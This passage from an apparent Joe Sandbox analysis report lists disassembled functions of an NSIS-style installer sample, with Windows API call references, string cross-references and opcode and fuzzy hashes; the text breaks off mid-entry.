Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3146d877d7562c2d3a476f841436afca9c9cbe5117cd0925db33b866b55f5f69
Instruction ID: 1047c3083b48eda73a4d910f8f86bc34801cf911bdf8082dd92821a77404dce4
Opcode Fuzzy Hash: 3146d877d7562c2d3a476f841436afca9c9cbe5117cd0925db33b866b55f5f69
Instruction Fuzzy Hash: 6BC1A174E01218CFDB54DFA9D994B9DBBB2BF89300F2081A9D409AB365DB749E85CF10

Function 348AB944 Relevance: .3, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc506b74e42097ca332a9e96e62f0ba5b48ebbe5167956a209712ab94be864e8
Instruction ID: 7df26e82c1b55deacb89e25b5b4f7fa4e164e4f01fa59b09dc22541ad59d7f59
Opcode Fuzzy Hash: cc506b74e42097ca332a9e96e62f0ba5b48ebbe5167956a209712ab94be864e8
Instruction Fuzzy Hash: 55C1A174E01218CFDB54DFA9D994B9DBBB2BF89300F1081A9D409AB365DB74AA85CF10

Function 348AE790 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78ff4844ad0db4312c00855b7ecd40fb3b13025d9452cc9012d94f2504271cd1
Instruction ID: d195f9a6410e63ef80a79836f21d098ebccf2772f23831a4bbbcf46f86dce81b
Opcode Fuzzy Hash: 78ff4844ad0db4312c00855b7ecd40fb3b13025d9452cc9012d94f2504271cd1
Instruction Fuzzy Hash: E1C1D274E00218CFDB55DFA4D994BADBBB2BF49300F1085A9D409AB365DB74AE86CF10

Function 348AEBF2 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3306527726.00000000348A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 348A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_348a0000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f270af88f4b7ab147429b10698c5f96f868ad31a9f74b36b0597b5c2683e40c7
Instruction ID: b9e458d957ffbcee05fc9a1c47c2cdc2023bccb6aa3f67307f2d627bbea60233
Opcode Fuzzy Hash: f270af88f4b7ab147429b10698c5f96f868ad31a9f74b36b0597b5c2683e40c7
Instruction Fuzzy Hash: 15B1B174E00218CFDB54DFA4D994BADBBB2BF49300F1085A9D809AB365DB74AE85CF11

Function 37B6F5D8 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3308770229.0000000037B60000.00000040.00000800.00020000.00000000.sdmp, Offset: 37B60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_37b60000_2CQ2zMn0hb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3b07adbe947cfce13dbc7888449b7f5dac546880d7f3f3ff5c7b1a20e5c3606
Instruction ID: 41915051a94cf5cd34dbf9c1813f4a63f615a4e9fb6c472648bf0da948da17ae
Opcode Fuzzy Hash: c3b07adbe947cfce13dbc7888449b7f5dac546880d7f3f3ff5c7b1a20e5c3606
Instruction Fuzzy Hash: FBD01734D40228CADB11DFA898402ECB770EB99310F0021A2C16CA3210C7B04A90CE41

Function 0040558F Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284windowclipboardmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000403), ref: 004055ED
GetDlgItem.USER32(?,000003EE), ref: 004055FC
GetClientRect.USER32(?,?), ref: 00405639
GetSystemMetrics.USER32(00000002), ref: 00405640
SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
ShowWindow.USER32(?,00000008), ref: 004056DC
GetDlgItem.USER32(?,000003EC), ref: 004056FD
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
GetDlgItem.USER32(?,000003F8), ref: 0040560B

Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2

GetDlgItem.USER32(?,000003EC), ref: 0040574F
CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
CloseHandle.KERNEL32(00000000), ref: 00405764
ShowWindow.USER32(00000000), ref: 00405788
ShowWindow.USER32(?,00000008), ref: 0040578D
ShowWindow.USER32(00000008), ref: 004057D7
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
CreatePopupMenu.USER32 ref: 0040581C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
GetWindowRect.USER32(?,?), ref: 00405850
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
OpenClipboard.USER32(00000000), ref: 004058B1
EmptyClipboard.USER32 ref: 004058B7
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
GlobalLock.KERNEL32(00000000), ref: 004058CD
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
GlobalUnlock.KERNEL32(00000000), ref: 00405901
SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
CloseClipboard.USER32 ref: 00405912

Strings

{, xrefs: 004057F5
(7B, xrefs: 0040587D

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: (7B${
API String ID: 590372296-525222780
Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68

Function 00403E86 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
ShowWindow.USER32(?), ref: 00403EDF
DestroyWindow.USER32 ref: 00403EF3
SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
GetDlgItem.USER32(?,?), ref: 00403F30
SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
IsWindowEnabled.USER32(00000000), ref: 00403F4B
GetDlgItem.USER32(?,00000001), ref: 00403FF9
GetDlgItem.USER32(?,00000002), ref: 00404003
SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
GetDlgItem.USER32(?,00000003), ref: 00404114
ShowWindow.USER32(00000000,?), ref: 00404135
EnableWindow.USER32(?,?), ref: 00404147
EnableWindow.USER32(?,?), ref: 00404162
GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
EnableMenuItem.USER32(00000000), ref: 0040417F
SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404197
SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
SetWindowTextW.USER32(?,00423728), ref: 004041E8
ShowWindow.USER32(?,0000000A), ref: 0040431C

Strings

(7B, xrefs: 004041C4

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
String ID: (7B
API String ID: 184305955-3251261122
Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D

Function 00403AD8 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 215stringregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF

lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,75923420,00435000,00000000), ref: 00403B59
lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40

Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C

RegisterClassW.USER32(004291E0), ref: 00403C7D
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C95
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
ShowWindow.USER32(00000005,00000000), ref: 00403D00
GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
RegisterClassW.USER32(004291E0), ref: 00403D42
DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61

Strings

(7B, xrefs: 00403B04
_Nb, xrefs: 00403C5C, 00403CC4
RichEdit20W, xrefs: 00403D24, 00403D2A
.exe, xrefs: 00403BE6
.DEFAULT\Control Panel\International, xrefs: 00403B44
RichEd32, xrefs: 00403D14
RichEd20, xrefs: 00403D06
RichEdit, xrefs: 00403D33
Control Panel\Desktop\ResourceLocale, xrefs: 00403B0C

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-1425696872
Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D

Function 0040451E Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 204windowstringCOMMON

Download Yara Rule

APIs

CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
GetDlgItem.USER32(?,000003E8), ref: 004045D0
SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
GetSysColor.USER32(?), ref: 004045FE
SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
lstrlenW.KERNEL32(?), ref: 0040461F
SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
GetDlgItem.USER32(?,0000040A), ref: 0040469A
SendMessageW.USER32(00000000), ref: 004046A1
GetDlgItem.USER32(?,000003E8), ref: 004046CC
SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
SetCursor.USER32(00000000), ref: 00404720
LoadCursorW.USER32(00000000,00007F00), ref: 00404739
SetCursor.USER32(00000000), ref: 0040473C
SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
SendMessageW.USER32(00000010,00000000,00000000), ref: 0040477D

Strings

N, xrefs: 004046BA

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
String ID: N
API String ID: 3103080414-1130791706
Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4

Function 00404850 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 275stringCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003FB), ref: 0040489F
SetWindowTextW.USER32(00000000,?), ref: 004048C9
SHBrowseForFolderW.SHELL32(?), ref: 0040497A
CoTaskMemFree.OLE32(00000000), ref: 00404985
lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5

Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,00000400,00404A0C), ref: 00405A45

Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066DF
Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 004066EE
Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 004066F3
Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,75923420,004036EF,?,00000006,00000008,0000000A), ref: 00406706

GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3

Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9

Strings

A, xrefs: 00404973
(7B, xrefs: 0040494D

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: (7B$A
API String ID: 2624150263-3645020878
Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D

Function 00406034 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078

Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85

GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
wsprintfA.USER32 ref: 004060B3
GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,00000004,004275C8,?,?,?,?,?), ref: 004060EE
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 004060FD
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
GlobalFree.KERNEL32(00000000), ref: 0040619C
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

Strings

%ls=%ls, xrefs: 004060A9
[Rename], xrefs: 0040611D, 0040612F

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
String ID: %ls=%ls$[Rename]
API String ID: 2171350718-461813615
Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD

Function 00402F30 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203memoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402F44
GetModuleFileNameW.KERNEL32(00000000,00438800,00000400), ref: 00402F60

Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04

GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
GlobalAlloc.KERNEL32(00000040,0040A230), ref: 004030F0

Strings

Error launching installer, xrefs: 00402F80
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
Null, xrefs: 00403029
soft, xrefs: 00403020
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
Inst, xrefs: 00403017

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 2803837635-787788815
Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD

Function 0040640A Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 209stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(004281E0,00000400), ref: 0040654B
GetWindowsDirectoryW.KERNEL32(004281E0,00000400,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
CoTaskMemFree.OLE32(00000000), ref: 004065B3
lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B

Memory Dump Source

Source File: 00000003.00000002.3283685650.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3283668198.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283760223.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283775713.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.3283827776.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_2CQ2zMn0hb.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D

Function 004043C6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 004043E3
GetSysColor.USER32(00000000), ref: 00404421
SetTextColor.GDI32(?,00000000), ref: 0040442D
SetBkMode.GDI32(?,?), ref: 00404439
GetSysColor.USER32(?), ref: 0040444C
SetBkColor.GDI32(?,?), ref: 0040445C
DeleteObject.GDI32(?), ref: 00404476
CreateBrushIndirect.GDI32(?), ref: 00404480

Memory Dump Source

